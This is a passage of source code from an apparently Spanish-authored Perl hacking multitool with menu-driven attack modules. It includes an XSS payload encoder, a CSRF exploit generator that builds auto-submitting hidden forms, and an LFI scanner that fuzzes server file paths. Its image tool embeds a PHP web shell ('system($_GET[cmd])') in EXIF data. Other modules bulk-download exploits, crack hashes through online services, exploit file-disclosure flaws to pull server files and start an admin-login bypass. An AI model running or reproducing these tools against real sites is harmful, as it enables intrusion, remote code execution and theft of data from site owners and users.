- my $target = printear( "\n[+] String : ", "stdin", "11", "13" );
- if ( $target ne "" ) {
- printear(
- "\n[XSS] : <script>var code =String.fromCharCode("
- . encode($target)
- . "); document.write(code);</script>\n",
- "text", "13", "5"
- );
- }
- else {
- printear( "\n[-] Write the string !\n", "text", "5", "5" );
- }
- adios();
- }
- elsif ( $op eq "3" ) {
- my $nueva = printear( "\n[+] String : ", "stdin", "11", "13" );
- my $code = toma( "http://tinyurl.com/api-create.php?url=" . $nueva );
- unless ( $code =~ /Error/ig ) {
- printear( "\n[+] Link : " . $code . "\n", "text", "13", "5" );
- }
- else {
- printear( "\n[+] Error\n", "text", "5", "5" );
- }
- adios();
- }
- elsif ( $op eq "4" ) {
- adios();
- }
- else {
- adios();
- }
- }
- sub head_mysqlman {
- printear( "
- @ @ @ @ @@@ @@@@ @
- @ @ @ @ @ @ @ @ @
- @@ @@ @ @ @ @ @ @
- @@ @@ @ @ @ @ @ @
- @ @ @ @ @ @@@ @ @ @
- @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @@ @
- @ @ @ @@@ @@@@ @@@@@
- @
- ", "logos", "7", "5" );
- }
- sub mysqlman {
- clean();
- head_mysqlman();
- my $host = printear( "[+] Hostname : ", "stdin", "11", "13" );
- my $user = printear( "\n[+] Username : ", "stdin", "11", "13" );
- my $pass = printear( "\n[+] Password : ", "stdin", "11", "13" );
- ##
- printear( "\n[+] Connecting to the server\n", "text", "13", "5" );
- $info = "dbi:mysql::" . $host . ":3306";
- if ( my $enter = DBI->connect( $info, $user, $pass, { PrintError => 0 } ) )
- {
- printear( "\n[+] Enter in the database\n", "text", "13", "5" );
- while (1) {
- my $ac = printear( "\n[+] Query : ", "stdin", "11", "13" );
- if ( $ac eq "exit" ) {
- $enter->disconnect;
- printear( "\n[+] Closing connection\n", "text", "5", "5" );
- adios();
- }
- $re = $enter->prepare($ac);
- $re->execute();
- my $total = $re->rows();
- my @columnas = @{ $re->{NAME} };
- if ( $total eq "-1" ) {
- printear( "\n[-] Query Error\n", "text", "5", "5" );
- next;
- }
- else {
- printear( "\n[+] Result of the query\n", "text", "13", "5" );
- if ( $total eq 0 ) {
- printear( "\n[+] Not rows returned\n", "text", "5", "5" );
- }
- else {
- printear(
- "\n[+] Rows returned : " . $total . "\n\n", "text",
- "13", "5"
- );
- for (@columnas) {
- printear( $_ . "\t\t", "text", "7", "5" );
- }
- print "\n";
- while ( @row = $re->fetchrow_array ) {
- for (@row) {
- printear( $_ . "\t\t", "text", "7", "5" );
- }
- print "\n";
- }
- }
- }
- }
- }
- else {
- print "\n[-] Error connecting\n";
- }
- ##
- adios();
- }
- sub head_exploitdb {
- printear( "
- @@@@@ @ @ @@@@@ @ @@@@ @ @@@@@ @@@@ @@@@
- @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @@@@ @ @@@@@ @ @ @ @ @ @ @ @@@@
- @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @
- @@@@@ @ @ @ @@@@@ @@@@ @ @ @@@@ @@@@
- ", "logos", "7", "5" );
- }
- sub exploitdb {
- clean();
- head_exploitdb();
- my $cosa = printear( "[+] String : ", "stdin", "11", "13" );
- if ( $cosa eq "" ) { adios(); }
- printear( "\n[+] Searching string\n", "text", "13", "5" );
- my %found = buscar($cosa);
- $total = int( keys %found ) - 1;
- printear( "\n[+] Exploits Found : " . $total . "\n\n", "text", "13", "5" );
- unless ( -d $cosa ) {
- mkdir( "logs/exploitdb/" . $cosa, "0777" );
- chmod "logs/exploitdb/" . $cosa, "0777";
- }
- for my $da ( keys %found ) {
- my $tata = $da;
- $tata =~ s/=//ig;
- $tata =~ s/\(//ig;
- $tata =~ s/\)//ig;
- $tata =~ s/\///ig;
- $tata =~ s/_//ig;
- $tata =~ s/\<//ig;
- $tata =~ s/(\s)+$//;
- if (
- download(
- $found{$da}, "logs/exploitdb/" . $cosa . "/" . $tata . ".txt"
- )
- )
- {
- printear( "[Exploit Found] : " . $da . "\n", "text", "7", "5" );
- chmod 0777, "logs/exploitdb/" . $cosa . "/" . $tata . ".txt";
- }
- }
- chmod 0777, "logs/exploitdb/" . $cosa;
- printear( "\n[+] Finished\n", "text", "13", "5" );
- adios();
- sub buscar {
- for my $n ( 1 .. 666 ) {
- my $code = toma(
- "http://www.exploit-db.com/search/?action=search&filter_page="
- . $n
- . "&filter_description="
- . $_[0]
- . "&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve="
- );
- chomp $code;
- if ( $code =~ /No results/ig ) {
- return %busca;
- }
- %busca = getlinks($code);
- }
- }
- sub getlinks {
- my $test = HTML::Parser->new(
- start_h => [ \&start, "tagname,attr" ],
- text_h => [ \&text, "dtext" ],
- );
- $test->parse( $_[0] );
- sub start {
- my ( $a, $b ) = @_;
- my %e = %$b;
- unless ( $a ne "a" ) {
- $d = $e{href};
- $c = $a;
- }
- }
- sub text {
- my $title = shift;
- chomp $title;
- unless ( $c ne "a" ) {
- if ( $d =~ /www.exploit-db.com\/exploits\/(.*)/ ) {
- my $id = $1;
- my $url = "http://www.exploit-db.com/download/" . $id;
- $links{$title} = $url;
- }
- $d = "";
- }
- }
- return %links;
- }
- }
- sub head_encodedecode {
- printear( "
- @@@@@ @ @ @@@@ @@@@ @@@@ @@@@@ @@@@@
- @ @@ @ @ @ @ @ @ @ @ @ @
- @ @@ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @
- @@@@ @ @ @ @ @ @ @ @ @@@@ @@@@@
- @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @@ @ @ @ @ @ @ @ @
- @ @ @@ @ @ @ @ @ @ @ @ @
- @@@@@ @ @ @@@@ @@@@ @@@@ @@@@@ @ @
- ", "logos", "7", "5" );
- }
- sub encodedecode {
- clean();
- head_encodedecode();
- printear( "
- [++] Options
- [+] 1 : MD5 encoder
- [+] 2 : base64 encoder
- [+] 3 : base64 decoder
- [+] 4 : ASCII encoder
- [+] 5 : ASCII decoder
- [+] 6 : HEX encoder
- [+] 7 : HEX decoder
- [+] 8 : URL encoder
- [+] 9 : URL decoder
- [+] 10 : Text to BIN
- [+] 11 : BIN to Text
- [+] 12 : Exit
- ", "text", "13", "5" );
- my $op = printear( "[+] Option : ", "stdin", "11", "13" );
- if ( $op eq "1" ) {
- my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" );
- printear( "\n[+] Result : " . md5_hex($texto) . "\n",
- "text", "13", "5" );
- adios();
- }
- elsif ( $op eq "2" ) {
- my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" );
- printear(
- "\n[+] Result : " . encode_base64($texto) . "\n", "text",
- "13", "5"
- );
- adios();
- }
- elsif ( $op eq "3" ) {
- my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" );
- printear(
- "\n[+] Result : " . decode_base64($texto) . "\n", "text",
- "13", "5"
- );
- adios();
- }
- if ( $op eq "4" ) {
- my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" );
- printear( "\n[+] Result : " . ascii($texto) . "\n", "text", "13", "5" );
- adios();
- }
- elsif ( $op eq "5" ) {
- my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" );
- printear(
- "\n[+] Result : " . ascii_de( $texto . "\n" ), "text",
- "13", "5"
- );
- adios();
- }
- elsif ( $op eq "6" ) {
- my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" );
- printear( "\n[+] Result : " . encode($texto) . "\n", "text", "13",
- "5" );
- adios();
- }
- elsif ( $op eq "7" ) {
- my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" );
- printear( "\n[+] Result : " . decode($texto) . "\n", "text", "13",
- "5" );
- adios();
- }
- elsif ( $op eq "8" ) {
- my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" );
- printear(
- "\n[+] Result : " . uri_escape($texto) . "\n", "text",
- "13", "5"
- );
- adios();
- }
- elsif ( $op eq "9" ) {
- my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" );
- printear(
- "\n[+] Result : " . uri_unescape($texto) . "\n", "text",
- "13", "5"
- );
- adios();
- }
- elsif ( $op eq "10" ) {
- my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" );
- printear(
- "\n[+] Result : " . unpack( "B*", $texto ) . "\n", "text",
- "13", "5"
- );
- adios();
- }
- elsif ( $op eq "11" ) {
- my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" );
- printear(
- "\n[+] Result : " . pack( "B*", $texto ) . "\n", "text",
- "13", "5"
- );
- adios();
- }
- elsif ( $op eq "12" ) {
- adios();
- }
- else {
- adios();
- }
- }
- sub head_portscanner {
- printear( "
- @@@@@ @@@@ @@@@@ @@@@@ @@@ @@@@ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @@ @
- @ @ @ @ @ @ @ @ @ @ @ @@ @
- @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @@@@@ @ @ @@@@@ @ @@@ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @@@@@ @ @@
- @ @ @ @ @ @ @ @ @ @@ @ @ @@
- @ @@@@ @ @ @ @@@ @@@@ @ @ @ @
- ", "logos", "7", "5" );
- }
- sub portscanner {
- clean();
- head_portscanner();
- printear( "
- [++] Options
- [+] 1 : Simple Scan
- [+] 2 : Full Scan
- [+] 3 : Exit
- ", "text", "13", "5" );
- my $op = printear( "[+] Option : ", "stdin", "11", "13" );
- if ( $op eq "1" ) {
- my %ports = (
- "21" => "ftp",
- "22" => "ssh",
- "25" => "smtp",
- "80" => "http",
- "110" => "pop3",
- "3306" => "mysql"
- );
- my $ip = printear( "\n[+] IP : ", "stdin", "11", "13" );
- printear( "\n[+] Scanning $ip ...\n\n", "text", "13", "5" );
- for my $port ( keys %ports ) {
- if (
- new IO::Socket::INET(
- PeerAddr => $ip,
- PeerPort => $port,
- Proto => "tcp",
- Timeout => 0.5
- )
- )
- {
- printear(
- "[Port] : "
- . $port
- . " [Service] : "
- . $ports{$port} . "\n",
- "text", "7", "5"
- );
- }
- }
- printear( "\n[+] Finished\n", "text", "13", "5" );
- adios();
- }
- elsif ( $op eq "2" ) {
- my $ip = printear( "\n[+] IP : ", "stdin", "11", "13" );
- my $start = printear( "\n[+] Start Port : ", "stdin", "11", "13" );
- my $end = printear( "\n[+] End Port : ", "stdin", "11", "13" );
- printear( "\n[+] Scanning $ip ...\n\n", "text", "13", "5" );
- for my $port ( $start .. $end ) {
- if (
- new IO::Socket::INET(
- Timeout => 0.5,
- PeerAddr => $ip,
- PeerPort => $port,
- Proto => "tcp",
- Timeout => 0.5
- )
- )
- {
- printear( "[+] Port Found : " . $port . "\n", "text", "7",
- "5" );
- }
- }
- printear( "\n[+] Scan Finished\n", "text", "13", "5" );
- adios();
- }
- elsif ( $op eq "3" ) {
- adios();
- }
- else {
- adios();
- }
- }
- sub head_httpfinger {
- printear( "
- @ @ @@@@@ @@@@@ @@@@@ @@@@@ @ @ @ @@@@ @@@@@ @@@@@
- @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @@ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @@@@@@ @ @ @@@@@ @@@@ @ @ @ @ @ @@@ @@@@ @@@@@
- @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @@ @ @ @ @ @
- @ @ @ @ @ @ @ @ @@ @ @@ @ @ @
- @ @ @ @ @ @ @ @ @ @@@ @ @@@@@ @ @
- ", "logos", "7", "5" );
- }
- sub httpfinger {
- clean();
- head_httpfinger();
- printear( "
- [++] Options
- [+] 1 : Simple Scan
- [+] 2 : Full Scan
- [+] 3 : Exit
- ", "text", "13", "5" );
- my $op = printear( "[+] Option : ", "stdin", "11", "13" );
- if ( $op eq "1" ) {
- my $page = printear( "\n[+] Page : ", "stdin", "11", "13" );
- printear( "\n[+] Getting Data ...\n", "text", "13", "5" );
- my $code = $nave->get($page);
- printear( "\n[+] Date : " . $code->header('date'), "text", "13", "5" );
- printear( "\n[+] Server : " . $code->header('server'),
- "text", "13", "5" );
- printear( "\n[+] Connection : " . $code->header('connection'),
- "text", "13", "5" );
- printear( "\n[+] Content-Type : " . $code->header('content-type'),
- "text", "13", "5" );
- printear( "\n\n[+] Finished\n", "text", "13", "5" );
- adios();
- }
- elsif ( $op eq "2" ) {
- my $page = printear( "\n[+] Page : ", "stdin", "11", "13" );
- printear( "\n[+] Getting Data ...\n", "text", "13", "5" );
- my $code = $nave->get($page);
- printear( "\n" . $code->headers()->as_string(), "text", "13", "5" );
- printear( "\n[+] Finished\n", "text", "13", "5" );
- adios();
- }
- elsif ( $op eq "3" ) {
- }
- else {
- adios();
- }
- }
- sub csrf_scan {
- clean();
- head_csrf();
- my $archivo_html = printear( "[+] File HTML : ", "stdin", "11", "13" );
- my $resultado = printear( "\n[+] SaveFile : ", "stdin", "11", "13" );
- unless ( -f $archivo_html ) {
- printear( "\n[-] File Not Found\n", "text", "5", "5" );
- adios();
- }
- printear( "\n[+] File to parse : " . $archivo_html . "\n",
- "text", "13", "5" );
- open( FILE, $archivo_html );
- my $words = join q(), <FILE>;
- close(FILE);
- my @testar = HTML::Form->parse( $words, "/" );
- $count = 0;
- foreach my $test (@testar) {
- $count++;
- printear( "\n -- == Form $count == --\n\n", "text", "13", "5" );
- if ( $test->attr(name) eq "" ) {
- printear( "[+] Name : No Found" . "\n", "text", "13", "5" );
- }
- else {
- printear( "[+] Name : " . $test->attr(name) . "\n",
- "text", "13", "5" );
- }
- printear( "[+] Action : " . $test->action . "\n", "text", "13", "5" );
- printear( "[+] Method : " . $test->method . "\n", "text", "13", "5" );
- printear( "\n-- == Input == --\n\n", "text", "13", "5" );
- @inputs = $test->inputs;
- printear( "Type\t\tName\t\tValue\n", "text", "13", "5" );
- foreach $in (@inputs) {
- printear( $in->type . "\t\t", "text", "13", "5" );
- printear( $in->name . "\t\t", "text", "13", "5" );
- printear( $in->value . "\t\t\n", "text", "13", "5" );
- }
- }
- my $op = printear( "\n\n[+] Form to generate : ", "stdin", "11", "13" );
- if ( $op ne "" ) {
- $op--;
- my $probar = ( HTML::Form->parse( $words, "/" ) )[$op];
- my $action = ver( $words, $op );
- my $fin = nombre($action) . ".html";
- savefile(
- "csrf/" . $resultado,
- "<form action=$action method=" . $probar->method . " name=exploit>"
- );
- @input = $probar->inputs;
- foreach $in (@input) {
- my $val = printear(
- "\n[+] Value of the " . $in->name . " : ", "stdin",
- "11", "13"
- );
- savefile(
- "csrf/" . $resultado,
- "<input type=hidden name=" . $in->name . " value=" . $val . ">"
- );
- }
- my $final =
- "</form><script language=javascript>function colocar(){document.exploit.submit()}
- </script><iframe width=6% height=%6 overflow=hidden onmouseover=javascript:colocar()>
- ";
- savefile( "csrf/" . $resultado, $final );
- printear( "\n[+] CSRF Exploit Generated\n", "text", "13", "5" );
- }
- adios();
- }
- sub ver {
- my $probar = ( HTML::Form->parse( $_[0], "/" ) )[ $_[1] ];
- my $action = $probar->action;
- my $co = $action;
- if ( $action eq "" or $action eq "/" ) {
- my $action = printear( "\n[+] Action : ", "stdin", "11", "13" );
- return $action;
- }
- else {
- return $co;
- }
- }
- sub head_csrf {
- printear( "
- @@@@ @@@ @@@@@ @@@@@ @@@@@ @@@@ @@@@ @
- @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @
- @ @@@ @@@@@ @@@@ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @
- @@@@ @@@ @ @ @ @ @@@@ @@@@ @@@@@
- ", "logos", "7", "5" );
- }
- sub lfi_scan {
- clean();
- head_lfi();
- printear( "
- [++] Options
- [+] 1 : Scan Page
- [+] 2 : Generate Image Infected
- [+] 3 : Exit
- ", "text", "13", "5" );
- my $op = printear( "[+] Option : ", "stdin", "11", "13" );
- if ( $op eq "1" ) {
- my $page = printear( "\n[+] Page : ", "stdin", "11", "13" );
- printear( "\n[+] Scanning ...\n", "text", "13", "5" );
- $code = toma( $page . "'" );
- if ( $code =~ /No such file or directory in <b>(.*)<\/b> on line/ig
- or $code =~
- /No existe el fichero o el directorio in <b>(.*?)<\/b> on line/ig )
- {
- printear( "[+] Vulnerable !\n", "text", "13", "5" );
- printear(
- "[*] Full path discloure detected : $1\n", "text",
- "13", "5"
- );
- printear( "\n[+] Status : [fuzzing files]\n\n", "text", "13", "5" );
- for my $file (@files) {
- $code1 = toma( $page . $file );
- unless ( $code1 =~
- /No such file or directory in <b>(.*)<\/b> on line/ig
- or $code =~
- /No existe el fichero o el directorio in <b>(.*?)<\/b> on line/ig
- )
- {
- $ok = 1;
- printear(
- "[File Found] : " . $page . $file . "\n", "text",
- "7", "5"
- );
- savefile( "lfi_logs.txt", $page . $file );
- }
- }
- unless ( $ok == 1 ) {
- printear( "\n[-] Dont found any file\n", "text", "5", "5" );
- }
- }
- else {
- printear( "\n[-] Page not vulnerable to LFI\n", "text", "5", "5" );
- }
- adios();
- }
- elsif ( $op eq "2" ) {
- my $image = printear( "\n[+] Image : ", "stdin", "11", "13" );
- my $poc = Image::ExifTool->new();
- $poc->ExtractInfo($image);
- $poc->SetNewValue( "Model", '<?php system($_GET["cmd"]);exit(1); ?>' );
- if ( $poc->WriteInfo($image) ) {
- printear( "\n[+] Enjoy this photo\n", "text", "7", "5" );
- }
- else {
- printear( "\n[-] Error\n", "text", "5", "5" );
- }
- adios();
- }
- elsif ( $op eq "3" ) {
- adios();
- }
- else {
- adios();
- }
- }
- sub head_lfi {
- printear( "
- ### ######## ##### ## ## ###
- # # # # # # # # # # # #
- # # # # # # # # #
- # ### # # # # # # #
- # # # # # # # # #
- # # # # # # # # #
- ######## ### ### ## ## #####
- ", "logos", "7", "5" );
- }
- sub menu_crackhash {
- head_crackhash();
- my $op = printear( "[+] Option : ", "stdin", "11", "13" );
- if ( $op eq "1" ) {
- my $ha = printear( "\n[+] Hash : ", "stdin", "11", "13" );
- if ( ver_length($ha) ) {
- printear( "\n[+] Cracking Hash...\n", "text", "13", "5" );
- my $re = crackit($ha);
- unless ( $re =~ /false01/ ) {
- printear( "\n[+] Cracked : $re\n", "text", "7", "5" );
- savefile( "hashes-found.txt", $ha . ":" . $re );
- }
- else {
- printear( "\n[-] Not Found\n\n", "text", "5", "5" );
- }
- }
- else {
- printear( "\n[-] Hash invalid\n", "text", "5", "5" );
- }
- printear( "\n[+] Press the enter key to return to main menu\n",
- "text", "13", "5" );
- <stdin>;
- menu_crackhash();
- }
- if ( $op eq "2" ) {
- my $fi = printear( "\n[+] Wordlist : ", "stdin", "11", "13" );
- if ( -f $fi ) {
- printear( "\n[+] Opening File\n", "text", "13", "5" );
- open( WORD, $fi );
- my @varios = <WORD>;
- close WORD;
- my @varios = repes(@varios);
- printear( "\n[+] Hashes Found : " . int(@varios),
- "text", "13", "5" );
- printear( "\n\n[+] Cracking hashes...\n\n", "text", "13", "5" );
- for $hash (@varios) {
- chomp $hash;
- if ( ver_length($hash) ) {
- my $re = crackit($hash);
- unless ( $re =~ /false01/ ) {
- printear( "[+] $hash : $re\n", "text", "7", "5" );
- savefile( "hashes-found.txt", $hash . ":" . $re );
- }
- }
- }
- }
- else {
- printear( "\n[-] File Not Found\n", "text", "5", "5" );
- }
- printear( "\n[+] Press the enter key to return to main menu\n",
- "text", "13", "5" );
- <stdin>;
- menu_crackhash();
- }
- if ( $op eq "3" ) {
- adios();
- }
- }
- sub crackit {
- my $md5 = shift;
- my $resultado;
- ## www.md5.net
- my $code = tomar(
- "http://www.md5.net/cracker.php",
- { 'hash' => $md5, 'submit' => 'Crack' }
- );
- if ( $code =~ m{<input type="text" id="hash" size="(.*?)" value="(.*?)"/>}
- and $code !~ /Entry not found./mig )
- {
- $resultado = $2;
- }
- else {
- ## md5online.net
- my $code = tomar( "http://md5online.net/index.php",
- { 'pass' => $md5, 'option' => 'hash2text', 'send' => 'Submit' } );
- if ( $code =~
- /<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>/ )
- {
- $resultado = $2;
- }
- else {
- ## md5decryption.com
- my $code = tomar(
- "http://md5decryption.com/index.php",
- { 'hash' => $md5, 'submit' => 'Decrypt It!' }
- );
- if ( $code =~ /Decrypted Text: <\/b>(.*?)<\/font>/ ) {
- $resultado = $1;
- }
- else {
- ## md5.my-addr.com
- my $code = tomar(
- "http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php",
- { 'md5' => $md5 }
- );
- if ( $code =~
- /<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/
- )
- {
- $resultado = $1;
- }
- else {
- $resultado = "false01";
- }
- }
- }
- }
- return $resultado;
- }
- sub head_crackhash {
- clean();
- printear( "
- ########## ######### ######### ##### # ### ###
- # # # ## # # # # # # # # # # # # # #
- # # ## # # # # # # # # # # # #
- ### # # # # # # ### ### ### # # ## ##
- # # # # # # # # # # # ##### # #
- # # # ## # # # # # # # # # # # # #
- ### ###### # ##### ######## # ### ### ###### ###
- ", "logos", "7", "5" );
- printear( "
- [++] Options
- [+] 1 : Hash
- [+] 2 : File with hashes
- [+] 3 : Exit
- ", "text", "13", "5" );
- } ##
- sub load_locateip {
- head_locateip();
- my $page = printear( "[+] Page : ", "stdin", "11", "13" );
- if ( $page eq "exit" ) {
- estoydentroporahora();
- }
- infocon($page);
- adios();
- sub head_locateip {
- clean();
- printear( "
- @ @@@@ @@@@ @ @@@@@ @@@@@ @ @@@@@
- @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @@@@ @ @@@@@
- @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @@@@@ @ @ @ @
- @ @ @ @ @@ @ @ @ @ @
- @@@@@ @@@@ @@@@ @ @ @ @@@@@ @ @
- ", "logos", "7", "5" );
- }
- sub infocon {
- my $target = shift;
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split($target);
- if ( $auth ne "" ) {
- my $get = gethostbyname($auth);
- my $target = inet_ntoa($get);
- printear( "\n[+] Getting info\n\n", "text", "13", "5" );
- $total =
- "http://www.melissadata.com/lookups/iplocation.asp?ipaddress=$target";
- $re = toma($total);
- if ( $re =~ /City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
- printear( "[+] City : $2\n", "text", "7", "5" );
- }
- else {
- printear( "[-] Not Found\n", "text", "5", "5" );
- adios();
- }
- if ( $re =~ /Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
- printear( "[+] Country : $2\n", "text", "7", "5" );
- }
- if ( $re =~
- /State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ )
- {
- printear( "[+] State or Region : $2\n", "text", "7", "5" );
- }
- printear( "\n[+] Getting Hosts\n\n", "text", "13", "5" );
- my $code = toma( "http://www.ip-adress.com/reverse_ip/" . $target );
- while ( $code =~ /whois\/(.*?)\">Whois/g ) {
- my $dns = $1;
- chomp $dns;
- printear( "[DNS] : $dns\n", "text", "7", "5" );
- }
- }
- }
- } ##
- ##
- sub load_findpaths {
- head_paths();
- my $web = printear( "[+] Web : ", "stdin", "11", "13" );
- if ( $web eq "exit" ) {
- estoydentroporahora();
- }
- printear( "\n[+] Scan Type\n", "text", "5", "5" );
- printear( "\n[+] 1 : Fast\n", "text", "13", "5" );
- printear( "[+] 2 : Full\n", "text", "13", "5" );
- printear( "[+] 3 : Exit\n", "text", "13", "5" );
- my $op = printear( "\n[+] Option : ", "stdin", "11", "13" );
- if ( $op eq "3" ) {
- estoydentroporahora();
- }
- printear( "\n[+] Scanning ....\n\n", "text", "13", "5" );
- if ( $op eq "1" ) {
- simple($web);
- }
- elsif ( $op eq "2" ) {
- escalar($web);
- }
- else {
- simplex($web);
- }
- adios();
- sub escalar {
- my $co = $_[0];
- my $code = toma( $_[0] );
- my @links = get_links($code);
- if ( $code =~ /Index of (.*)/ig ) {
- printear( "[+] Link : $co\n", "text", "7", "5" );
- savefile( "paths-logs.txt", $co );
- my $dir_found = $1;
- chomp $dir_found;
- while ( $code =~ /<a href=\"(.*)\">(.*)<\/a>/ig ) {
- my $ruta = $1;
- my $nombre = $2;
- unless ( $nombre =~ /Parent Directory/ig
- or $nombre =~ /Description/ig )
- {
- push( @encontrados, $_[0] . "/" . $nombre );
- }
- }
- }
- for my $com (@links) {
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
- if ( $path =~ /\/(.*)$/ ) {
- my $path1 = $1;
- $_[0] =~ s/$path1//ig;
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
- if ( $path =~ /(.*)\// ) {
- my $parche = $1;
- unless ( $repetidos =~ /$parche/ ) {
- $repetidos .= " " . $parche;
- my $yeah = "http://" . $auth . $parche;
- escalar($yeah);
- }
- }
- for (@encontrados) {
- escalar($_);
- }
- }
- }
- }
- sub simplex {
- my $code = toma( $_[0] );
- my @links = get_links($code);
- for my $com (@links) {
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
- if ( $path =~ /\/(.*)$/ ) {
- my $path1 = $1;
- $_[0] =~ s/$path1//ig;
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
- if ( $path =~ /(.*)\// ) {
- my $parche = $1;
- unless ( $repetidos =~ /$parche/ ) {
- $repetidos .= " " . $parche;
- my $code = toma( "http://" . $auth . $parche );
- if ( $code =~ /Index of (.*)</ig ) {
- my $dir_found = $1;
- chomp $dir_found;
- my $yeah = "http://" . $auth . $parche;
- printear( "[+] Link : $yeah\n", "text", "7", "5" );
- savefile( "paths-logs.txt", $yeah );
- }
- }
- }
- }
- }
- }
- sub head_paths {
- clean();
- printear( "
- @@@@@ @ @ @@@@@ @
- @ @ @ @ @ @
- @ @ @ @ @ @
- @ @ @ @@ @@@@ @@@ @@ @ @ @@@ @@ @ @@ @@
- @@@@ @ @@ @ @ @ @ @ @ @@@@@ @ @ @@ @ @ @
- @ @ @ @ @ @ @@@@@ @ @ @@@@ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @@@@ @@@ @ @ @@@@ @ @ @ @@
- ", "logos", "7", "5" );
- }
- } ##
- sub load_fsd {
- head_fsd();
- my $page = printear( "[+] Page : ", "stdin", "11", "13" );
- if ( $page eq "exit" ) {
- estoydentroporahora();
- }
- ver_now_now($page);
- adios();
- sub ver_now_now {
- my $page = $_[0];
- my $archivo;
- if ( $page =~ /(.*)\/(.*)\?/ ) {
- $archivo = $2;
- }
- printear( "\n[+] Scanning page ...\n", "text", "13", "5" );
- my $code = toma( $page . $archivo );
- if ( $code =~ /header\((.*)Content-Disposition: attachment;/ig ) {
- printear( "\n[+] Vulnerable !\n", "text", "13", "5" );
- my $code = toma( $page . "'" );
- if ( $code =~ /No such file or directory in <b>(.*)<\/b> on line/ )
- {
- printear(
- "\n[+] Full Source Discloure Detect : $1\a\n", "text",
- "7", "5"
- );
- }
- elsif ( $code =~
- /No existe el fichero o el directorio in <b>(.*)<\/b> on line/ )
- {
- printear(
- "\n[+] Full Source Discloure Detect : $1\a\n", "text",
- "7", "5"
- );
- }
- else {
- printear(
- "\n[+] Full Path Dislocure : Not Found\n", "text",
- "7", "5"
- );
- }
- while (1) {
- my $url = printear( "\n[+] URL : ", "stdin", "11", "13" );
- if ( $url eq "exit" ) {
- adios();
- }
- if (
- download( $page . $url, "logs/fsdlogs/" . basename($url) ) )
- {
- printear( "\n[+] File Downloaded\n", "text", "13", "5" );
- system_leida( "logs/fsdlogs/" . basename($url) );
- }
- }
- }
- else {
- printear( "\n[-] Web not vulnerable\n\n", "text", "5", "5" );
- }
- }
- sub head_fsd {
- clean();
- printear( "
- @@@@@ @@@ @@@@ @@@@@ @ @ @@@@@ @ @@@@ @ @@@@@
- @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @@@@ @@@ @ @ @@@@ @ @@@@@ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @@@ @@@@ @@@@@ @ @ @ @@@@@ @@@@ @ @
- ", "logos", "7", "5" );
- }
- sub download {
- if ( $nave->mirror( $_[0], $_[1] ) ) {
- if ( -f $_[1] ) {
- return true;
- }
- }
- }
- sub installer_fsd {
- unless ( -d "fsdlogs/" ) {
- mkdir( "fsdlogs/", "777" );
- chmod "fsdlogs/", "0777";
- }
- }
- } ##
- sub load_bypass {
- head_bypass();
- start_com();
- adios();
- sub start_com {
- my $url = printear( "\n\n[+] Admin : ", "stdin", "11", "13" );
- if ( $url eq "exit" ) {
- estoydentroporahora();
- }
- print "\n[+] Scanning page ...\n";
- my $code = toma($url);
- my @testar = HTML::Form->parse( $code, "/" );
- $count = 0;
- foreach my $test (@testar) {
- $count++;
- printear( "\n -- == Form $count == --\n\n", "text", "5", "5" );
- if ( $test->attr(name) eq "" ) {
- printear( "[+] Name : No Found" . "\n", "text", "13", "5" );
